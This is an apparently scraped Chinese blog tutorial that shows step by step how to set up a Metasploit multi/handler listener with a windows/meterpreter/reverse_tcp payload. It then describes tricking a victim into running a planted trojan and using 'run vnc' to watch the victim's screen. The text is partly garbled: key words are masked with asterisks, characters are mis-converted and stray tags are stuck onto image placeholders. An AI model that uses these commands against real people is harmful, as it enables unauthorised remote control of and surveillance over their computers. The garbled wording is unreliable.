网络安全工程师演示:原来***是这样控制你的计算机的!(下)

时间  2020-11-21 标签 编程 windows 网络 session 框架 tcp ide 工具 学习 测试

课前声明:
一、本分享仅作学习交流,请自觉遵照法律法规!
二、搜索:Kali 与编程,学习更多网络***干货!
三、Kali 与编程天天准时更新,敬请学习和关注!
正文部分
1、背景介绍
Metasploit就是一个漏洞框架。它的全称叫作The Metasploit Framework,简称叫作MSF。Metasploit做为全球最受欢迎的工具,不单单是由于它的方便性和强大性,更重要的是它的框架。它容许使用者开发本身的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让咱们一块儿学习!
2、资源装备
1.安装好且已经被安装***的Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3、战略安排
3.1 利用Metasploit(msf)***框架对目标受害者主机进行***控制,以下图所示。
步骤1:开启Metasploit(msf)***测试框架,以下图所示。
命令:msfconsole
在这里插入图片描述编程

步骤2:使用对应的漏洞利用模块,以下图所示。(固然你也能够利用search命令检索对应的漏洞进行利用)
命令:use exploit/multi/handler
在这里插入图片描述windows

步骤3:设置payload链接方式,以下图所示。
命令:set payload windows/meterpreter/reverse_tcp
在这里插入图片描述网络

步骤4:查看***模块须要设置的参数,以下图所示。
命令:show options
在这里插入图片描述session

步骤5:须要设置的***参数以下图所示。
Lhost:***者主机IP地址。
在这里插入图片描述框架

步骤6:查看***者主机(Kali主机)的IP地址,以下图所示。
命令:ifconfig
在这里插入图片描述tcp

步骤7:设置对应的参数,以下图所示。
这里以设置lhost(***者主机IP)举例
命令:set lhost IP
例子:set lhost 192.168.78.144
在这里插入图片描述ide

步骤8:查看对应的参数是否设置成功,以下图所示。
命令:show options
在这里插入图片描述工具

步骤9:运行***模块,以下图所示。
命令:run
在这里插入图片描述学习

3.2 利用社会工程学相关手段诱导受害者主机使用者启动其主机已经下载的***文件(这里作实验就直接进入受害者主机双击打开),以下图所示。
在这里插入图片描述测试

3.3 以下图所示,在Kali***者主机生成了对应的session会话。
在这里插入图片描述

3.4 利用***控制受害者主机,以下图所示。
步骤1:运行vnc程序监控目标主机,以下图所示。
命令:run vnc
在这里插入图片描述

步骤2:以下图所示,运行命令后对应的监控画面显示到kali主机中,能够监控受害者主机的一举一动。
在这里插入图片描述
在这里插入图片描述
小编一个个字敲打创做,可辛苦了,问君能否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!

联系我们 沪ICP备13005482号-10